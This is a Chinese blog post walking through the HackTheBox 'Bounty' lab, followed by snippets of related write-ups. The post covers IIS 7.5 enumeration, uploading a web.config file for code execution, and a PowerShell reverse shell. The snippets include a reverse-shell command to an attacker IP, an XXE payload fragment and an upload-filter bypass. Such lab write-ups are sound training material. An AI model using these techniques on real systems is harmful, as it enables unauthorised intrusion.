hackthebox-Bounty (考点:上传/IIS7.5安全/windows)

最新推荐文章于 2022-11-17 13:08:07 发布
最新推荐文章于 2022-11-17 13:08:07 发布
阅读量437 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105551045
版权
本文详细介绍了如何利用nmap发现80端口上的IIS7.5服务,通过Dirbuster扫描asp和aspx文件,发现上传功能并成功读取文件。接着,通过研究web.config实现远程代码执行(RCE),使用powershell弹shell,最终提权。整个过程展示了Windows靶机的渗透测试技巧。
摘要由CSDN通过智能技术生成

1、nmap

在这里插入图片描述
就一个80,没啥别的,扫出来显示是iis7.5,说明很可能这就是个突破口&考点

2、IIS 渗透 & web.config

因为是iis,所以对于asp&aspx文件是要重视的,在拿dirbuster扫时也要添加这俩后缀文件名

扫出
在这里插入图片描述
打开看第一个是上传,然后在第二个里读取

在这里插入图片描述

经验证,随便传图片,读取成功。那么突破思路就是上传了。
在这里插入图片描述
但我试了很多php和aspx,都没用,让人郁闷

只好搜iis7.5 rce upload之类的关键词。

只能说谷歌可能确实比百度爽。。外国佬做题还是有优势,一是用谷歌方便,二是英语母语方便,很容易读懂那些漏洞文档,三是先进技术和文档还是在国外多些。。

一搜就看到web.config,这是个新思路
在这里插入图片描述
然后我找到了这个,文章里还有个超链接,是从另一个大神那里学到的方法。

试了试,我再把cmd命令改一改,直接弹shell。因为是Windows,所以用powershell拿shell方便些,参考这个

Windows的渗透方法大同小异,powershell可参考之前写的标题带(考点:windows)靶机文章,比如这个box

在powershell弹shell的那里,改成自己的ip。最后文件命名为web.config.通过靶机的网页传上去。最后打开

最低0.47元/天 解锁文章
冬萍子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hackthebox-Jerry(考点:tomcat安全/windows
冬萍子癸水
04-16 423
nmap 就8080,扫描结果显示是tom猫 网上有很多方法,把tom猫按在地上摩擦。。。这个 先传统方法。进去,上传 dirbuster搜到manager登录页面 不知道密码,那么想法找密码,但是如果此时点了取消登录框cancel,密码就自动出来了。。。。。。。。额 或者kali自带的破解tom的字典,在这里 然后用这个小脚本自动跑 #!/usr/bin/env python impor...
Hackthebox:Bounty Walkthrough(not use metasploit)
汗的博客
12-18 361
Bounty是一台Hacktheboxwindows靶机,难度3.4
HackTheBox::Bounty
aya3t的博客
10-12 207
HackTheBox::Bounty
HackTheBox-BountyHunter WP
h1nt的博客
09-07 538
0x01 信息收集. 端口信息 目录扫描 0x02 打靶 一通乱点后来到一个后台地址: 提交后在burp中能够发现网站和后台通信的数据: 进行URL解码和BASE64解码后发现是xml: 于是可以试试XXE,首先读取文件: 成功了,接下来可以试试读取别的文件: 但是该读什么文件呢,在之前的扫描目录可以发现db.php,于是尝试读取db.php: <?xml version="1.0"?> <!DOCTYPE ANY [ <!ENT
Hack the box靶机 Bounty
菜浪马废的博客
06-03 468
两个页面都是没有权限不能访问 但是也没有扫出来登录页面 投个图 他们换了本字典 我懒得扫了 有过滤 上传了一个shell.php.gif绕过了 找到一篇博客 上传.config 使用nishang的Invoke-PowerShellTcp.ps1的时候 需要在这个文件末尾加入调用 Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443 然后就可以连接了 没有补丁 那ms15-051 完成 ...
Bug-Bounty-Tools:错误赏金的随机工具
04-14
错误赏金,或称为Bug Bounty,是一种网络安全策略,企业通过这种方式鼓励白帽黑客发现并报告其系统中的漏洞,而不是让黑帽黑客利用这些漏洞。"Bug-Bounty-Tools" 是一个专门为参与Bug Bounty活动的专家设计的工具...
Bug-Bounty-Bash脚本:Bash的赏金
02-12
此仓库是为私人Bug狩猎创建的 需要安装的脚本 要运行该项目,您将需要安装以下程序: 搜寻Asn Amass Amass intel将以比默认速度更快的速度从ASN的数据库中搜索组织“ paypal”。... amass intel -org paypal -max-dns-...
avastars-bounty-hunter:Avastars的赏金猎人工具
05-13
s.src = "https://cdn.jsdelivr.net/gh/kaigani/avastars-bounty-hunter@a0f0fd5115a14c772052027bccdf9334567f2379/_bountyHunter_app.min.js";document.head.appendChild(s)})() 打开 页面完全加载后,单击小书签
burp-bounty-profiles:Burp Bounty个人资料编辑,随时为您贡献力量!
05-28
打bur赏金概况这是扩展程序的个人资料集合,请随时使用和贡献!指示将加载到Burp Suite中后,转到Burp Bounty Options选项卡,并设置克隆此存储库的计算机的路径。 您可以支持这项工作给我买杯咖啡:
Bug-bounty:Bug 赏金狩猎的资源
05-29
- **VulnHub**和**Hack The Box**:提供虚拟靶机环境,让你在安全的环境中练习漏洞利用。 - **PicoCTF和CTFTime**:参加网络安全挑战赛,提升实战技能。 8. **合规性和道德规范** - **负责任的披露政策**:了解...
IIS 7.5 解析错误 命令执行漏洞解决方案
09-30
主要介绍了IIS 7.5 解析错误 命令执行漏洞解决方案,需要的朋友可以参考下
【Hack The Boxwindows练习-- Bounty
人间体佐菲的博客
10-31 545
【Hack The Boxwindows练习-- Bounty
No.59-HackTheBox-windows-Bounty-Walkthrough渗透学习
qq_34801745的博客
02-20 701
** HackTheBox-windows-Bounty-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/142 靶机难度:初级(3.7/10) 靶机发布日期:2018年11月2日 靶机描述: Bounty is an easy to medium difficulty machine, which featu...
HackTheBox-BountyHunter靶场通关记录
weixin_43876438的博客
10-26 2833
文章目录HackTheBox-BountyHunter靶场准备工作信息搜集漏洞利用提权 HackTheBox-BountyHunter靶场 准备工作 打开hackthebox并找到bountyhunter靶场,关注并获取到IP地址 在hackthebox中下载vpn Kali虚拟机,并运行指定的vpn 信息搜集 我拿到的IP地址为:10.10.11.100 使用nmap进行端口扫描,看看开放了哪些端口。sudo nmap -Pn -sS -p- 10.10.11.100 可以看到开放了22端
HackTheBox::BountyHunter
aya3t的博客
10-24 367
HackTheBox::BountyHunter
hackthebox --BountyHunter
weixin_47156475的博客
08-13 433
文章目录一、信息收集二、getshell三、提权总结 一、信息收集 先扫描一下,看看开启了哪些端口,哪些服务,以及哪些敏感目录 经过一番搜素以及检查,发现并不存在服务漏洞,也没有什么敏感的目录 于是扩大目录的扫描范围 : 发现一个叫db.php的文件以及一个叫resources的文件夹,访问resources文件夹的结果如下: db.php访问没有任何信息 于是老老实实地去80端口访问 到处点点点,然后发现了一个提交页面 抓包分析一下 data里面的数据是先base64加密,然后在url加密
【Hack The Boxwindows练习-- Omni
人间体佐菲的博客
11-17 1181
【Hack The Boxwindows练习-- Omni
No.64-HackTheBox-windows-Bart-Walkthrough渗透学习
qq_34801745的博客
03-12 591
** HackTheBox-windows-Bart-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/128 靶机难度:初级(3.7/10) 靶机发布日期:2017年12月20日 靶机描述: Bart is a fairly realistic machine, mainly focusing on prope...
【Hack The Boxwindows练习-- Blackfield
最新发布
人间体佐菲的博客
11-17 428
【Hack The Boxwindows练习-- Blackfield
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值